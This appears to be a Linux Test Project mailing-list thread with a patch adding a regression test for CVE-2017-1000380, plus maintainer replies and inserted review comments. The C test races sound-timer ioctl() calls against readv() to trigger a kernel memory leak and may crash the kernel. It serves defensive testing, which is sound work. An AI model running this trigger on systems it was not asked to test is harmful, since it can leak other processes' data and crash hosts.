* [LTP] [PATCH v4] Add a regression test for CVE-2017-1000380
@ 2019-07-11 14:10 Michael Moese
From: Michael Moese @ 2019-07-11 14:10 UTC (permalink / raw)
To: ltp
A race condition was present in the linux kernel, which could lead to
a leak of arbitrary kernel memory to userspace applications.
The issue was fixed in those kernel commits:
http://git.kernel.org/linus/d11662f4f798b50d8c8743f433842c3e40fe3378
http://git.kernel.org/linus/ba3021b2c79b2fa9114f92790a99deb27a65b728
This patch adds a regression test triggering this race condition.
Signed-off-by: Michael Moese <mmoese@suse.de>
---
Changes to v2:
- remove leftover declaration of unused variable in ioctl_thread()
- reduced iov_len by 1, so the strlen command hits a valid \0 for sure
in any case.
- fix whitespace before tab in Makefile
Changes to v1:
- Initialize buffers in ioctl_thread() outside of the loop
- use return unused() instead of a void* cast of NULL in ioctl_thread()
- reset non-zero flag in run() for every iteration of the main loop
---
runtest/cve | 1 +
testcases/kernel/Makefile | 1 +
testcases/kernel/sound/.gitignore | 1 +
testcases/kernel/sound/Makefile | 12 +++
testcases/kernel/sound/snd_timer01.c | 139 +++++++++++++++++++++++++++
5 files changed, 154 insertions(+)
create mode 100644 testcases/kernel/sound/.gitignore
create mode 100644 testcases/kernel/sound/Makefile
create mode 100644 testcases/kernel/sound/snd_timer01.c
diff --git a/runtest/cve b/runtest/cve
index 031bcdc2a..33c9196e0 100644
--- a/runtest/cve
+++ b/runtest/cve
@@ -36,6 +36,7 @@ cve-2017-17052 cve-2017-17052
cve-2017-16939 cve-2017-16939
cve-2017-17053 cve-2017-17053
cve-2017-18075 pcrypt_aead01
+cve-2017-1000380 snd_timer01
cve-2018-5803 sctp_big_chunk
cve-2018-1000001 realpath01
cve-2018-19854 crypto_user01
diff --git a/testcases/kernel/Makefile b/testcases/kernel/Makefile
index 39d79c7d8..eff5b3e7d 100644
--- a/testcases/kernel/Makefile
+++ b/testcases/kernel/Makefile
@@ -52,6 +52,7 @@ SUBDIRS += connectors \
pty \
sched \
security \
+ sound \
timers \
tracing \
diff --git a/testcases/kernel/sound/.gitignore b/testcases/kernel/sound/.gitignore
new file mode 100644
index 000000000..57eae0593
--- /dev/null
+++ b/testcases/kernel/sound/.gitignore
@@ -0,0 +1 @@
+snd_timer
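Review bot: The ignore entry `snd_timer` does not cover the binary this directory builds, which the Makefile and runtest entry name `snd_timer01`; a gitignore pattern without a wildcard matches the file name exactly, so the built test would still show up as untracked. Change the line to `snd_timer01` (or `snd_timer*` if more tests are planned in this directory).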
diff --git a/testcases/kernel/sound/Makefile b/testcases/kernel/sound/Makefile
new file mode 100644
index 000000000..ad1e25c30
--- /dev/null
+++ b/testcases/kernel/sound/Makefile
@@ -0,0 +1,12 @@
+# SPDX-License-Identifier: GPL-2.0-or-later
+
+top_srcdir := ../../..
+
+include $(top_srcdir)/include/mk/testcases.mk
+
+CPPFLAGS += -D_GNU_SOURCE
+
+LDLIBS += -pthread
+
+
+include $(top_srcdir)/include/mk/generic_leaf_target.mk
diff --git a/testcases/kernel/sound/snd_timer01.c b/testcases/kernel/sound/snd_timer01.c
new file mode 100644
index 000000000..fe2f3ed3f
--- /dev/null
+++ b/testcases/kernel/sound/snd_timer01.c
@@ -0,0 +1,139 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+
+/* Copyright (c) 2019 Michael Moese <mmoese@suse.com>
+ * Regression test for CVE-2017-1000380 based on the original PoC exploit
+ * by Alexander Potapenko <glider@google.com>
+ *
+ * Be careful! This test may crash your kernel!
+ *
+ * The test performs several ioctl() parallel with readv() on the same
+ * file descriptor to /dev/snd/timer. A buggy kernel will leak memory
+ * to the process, which may contain information from the the kernel or
+ * any other process on the system.
+ *
+ * The issue was fixed with
+ * http://git.kernel.org/linus/d11662f4f798b50d8c8743f433842c3e40fe3378
+ * http://git.kernel.org/linus/ba3021b2c79b2fa9114f92790a99deb27a65b728
+ */
+
+#include "config.h"
+#include "tst_test.h"
+#include "tst_taint.h"
+#include "tst_fuzzy_sync.h"
+#include "tst_safe_macros.h"
+#include "tst_safe_pthread.h"
+
+#include <errno.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <string.h>
+#include <sys/uio.h>
+#include <sys/ioctl.h>
+#include <sound/asound.h>
+
+#define MAX_BUFSIZE 1024
+
+static int snd_fd;
+static struct tst_fzsync_pair fzsync_pair;
+
+static void *ioctl_thread(void *unused)
+{
+ int tread_arg = 1;
+ struct snd_timer_select ts;
+ struct snd_timer_params tp;
+
+ memset(&ts, 0, sizeof(ts));
+ ts.id.dev_class = 1;
+
+ memset(&tp, 0, sizeof(tp));
+ tp.ticks = 1;
+ tp.filter = 0xf;
+
+ while (tst_fzsync_run_b(&fzsync_pair)) {
+
+ ioctl(snd_fd, SNDRV_TIMER_IOCTL_TREAD, &tread_arg);
+
+ ioctl(snd_fd, SNDRV_TIMER_IOCTL_SELECT, &ts);
+
+ ioctl(snd_fd, SNDRV_TIMER_IOCTL_PARAMS, &tp);
+
+ ioctl(snd_fd, SNDRV_TIMER_IOCTL_START, 0);
+
+ tst_fzsync_end_race_b(&fzsync_pair);
+ }
+ return unused;
+}
+
+static void setup(void)
+{
+ tst_fzsync_pair_init(&fzsync_pair);
+ tst_taint_init(TST_TAINT_W | TST_TAINT_D);
+ snd_fd = SAFE_OPEN("/dev/snd/timer",
+ O_RDONLY|O_CREAT|O_NOCTTY|O_SYNC|O_LARGEFILE, 0);
+}
+
+static void cleanup(void)
+{
+ tst_fzsync_pair_cleanup(&fzsync_pair);
+ SAFE_CLOSE(snd_fd);
+}
+
+static void run(void)
+{
+ size_t len;
+ int size;
+ struct iovec iov;
+ pthread_t th;
+ char read_buf[MAX_BUFSIZE];
+ int i, nz;
+ pthread_attr_t thread_attr;
+
+ pthread_attr_init(&thread_attr);
+ pthread_attr_setdetachstate(&thread_attr, PTHREAD_CREATE_DETACHED);
+ SAFE_PTHREAD_CREATE(&th, &thread_attr, ioctl_thread, NULL);
+
+ iov.iov_base = read_buf;
+ iov.iov_len = sizeof(read_buf) - 1;
+
+ while (tst_fzsync_run_a(&fzsync_pair)) {
+ nz = 0;
+ memset(read_buf, 0, sizeof(read_buf));
+ size = readv(snd_fd, &iov, 1);
+
+ tst_fzsync_end_race_a(&fzsync_pair);
+
+ /* check if it could be a valid ioctl result */
+ if (size == 0)
+ continue;
+
+ /* check if the buffer is non-empty */
+ for (i = 0; i < size; i++) {
+ if (read_buf[i]) {
+ nz = 1;
+ break;
+ }
+ }
+ if (!nz)
+ continue;
+
+ len = strlen(read_buf);
+ /* the kernel's struct snd_timer_read is two unsigned integers*/
+ if (len <= 2 * sizeof(unsigned int))
+ continue;
+
+ tst_res(TFAIL, "kernel seems vulnerable");
+ return;
+ }
+
+ if (tst_taint_check() != 0)
+ tst_res(TFAIL, "kernel seems vulnerable");
+ else
+ tst_res(TPASS, "kernel seems not vulnerable");
+}
+
+static struct tst_test test = {
+ .test_all = run,
+ .setup = setup,
+ .cleanup = cleanup,
+};
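Review bot: The return values of the four ioctl() calls in ioctl_thread() and of readv() in run() are never inspected, so on a system where SNDRV_TIMER_IOCTL_SELECT or SNDRV_TIMER_IOCTL_PARAMS fails on every iteration (no timer matching dev_class 1) or readv() keeps returning -1, the loop still falls through to TPASS "kernel seems not vulnerable" although the race was never exercised. A readv() error is currently masked only because `size == 0` and the `i < size` loop both happen to treat -1 as an empty read; make it explicit with `if (size < 0) tst_brk(TBROK | TERRNO, "readv()");`, declare `size` as `ssize_t` to match readv()'s return type, and consider reporting once, outside the race loop, whether the ioctl sequence succeeds at all. The comment above the strlen() threshold says the kernel returns struct snd_timer_read (two unsigned ints), but the thread enables SNDRV_TIMER_IOCTL_TREAD first, under which reads are presumably delivered as struct snd_timer_tread; the comment should state which record layout the 8-byte threshold is derived from, since the leak heuristic depends on it. pthread_attr_init() in run() has no matching pthread_attr_destroy(), which leaks per test iteration; add `pthread_attr_destroy(&thread_attr);` right after SAFE_PTHREAD_CREATE().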
--
2.22.0
* [LTP] [PATCH v4] Add a regression test for CVE-2017-1000380
From: Cyril Hrubis @ 2019-07-12 13:31 UTC (permalink / raw)
To: ltp
Hi!
Pushed with a minor change, thanks.
> +static void cleanup(void)
> +{
> + tst_fzsync_pair_cleanup(&fzsync_pair);
I've removed the tst_fzsync_pair_cleanup() here because the function is a
no-op unless you started the second thread by the fzsync reset call.
> + SAFE_CLOSE(snd_fd);
> +}
--
Cyril Hrubis
chrubis@suse.cz
* [LTP] [PATCH v4] Add a regression test for CVE-2017-1000380
From: Li Wang @ 2019-07-16 10:19 UTC (permalink / raw)
To: ltp
On Thu, Jul 11, 2019 at 10:10 PM Michael Moese <mmoese@suse.de> wrote:
> ...
> +
> +static void setup(void)
> +{
> + tst_fzsync_pair_init(&fzsync_pair);
> + tst_taint_init(TST_TAINT_W | TST_TAINT_D);
> + snd_fd = SAFE_OPEN("/dev/snd/timer",
> + O_RDONLY|O_CREAT|O_NOCTTY|O_SYNC|O_LARGEFILE, 0);
>
Should we check if the file exists before opening it?
Otherwise, snd_timer01 failed as:
# ./snd_timer01
tst_test.c:1100: INFO: Timeout per run is 0h 05m 00s
safe_macros.c:225: BROK: snd_timer01.c:73: open(/dev/snd/timer,1052992,00)
failed: ENOENT
# lsmod |grep -i snd
# grep -i snd /boot/config-4.18.0-107.el8.s390x
# ls /dev/snd/timer
ls: cannot access '/dev/snd/timer': No such file or directory
--
Regards,
Li Wang
* [LTP] [PATCH v4] Add a regression test for CVE-2017-1000380
From: Cyril Hrubis @ 2019-07-16 10:31 UTC (permalink / raw)
To: ltp
Hi!
> > +static void setup(void)
> > +{
> > + tst_fzsync_pair_init(&fzsync_pair);
> > + tst_taint_init(TST_TAINT_W | TST_TAINT_D);
> > + snd_fd = SAFE_OPEN("/dev/snd/timer",
> > + O_RDONLY|O_CREAT|O_NOCTTY|O_SYNC|O_LARGEFILE, 0);
> >
>
> Should we check if the file exists before opening it?
Yes we should. We should add access("/dev/snd/timer", F_OK) to the test
setup.
> Otherwise, snd_timer01 failed as:
>
> # ./snd_timer01
> tst_test.c:1100: INFO: Timeout per run is 0h 05m 00s
> safe_macros.c:225: BROK: snd_timer01.c:73: open(/dev/snd/timer,1052992,00)
> failed: ENOENT
>
> # lsmod |grep -i snd
>
> # grep -i snd /boot/config-4.18.0-107.el8.s390x
>
> # ls /dev/snd/timer
> ls: cannot access '/dev/snd/timer': No such file or directory
I guess that there is no soundcard on mainframe :-).
--
Cyril Hrubis
chrubis@suse.cz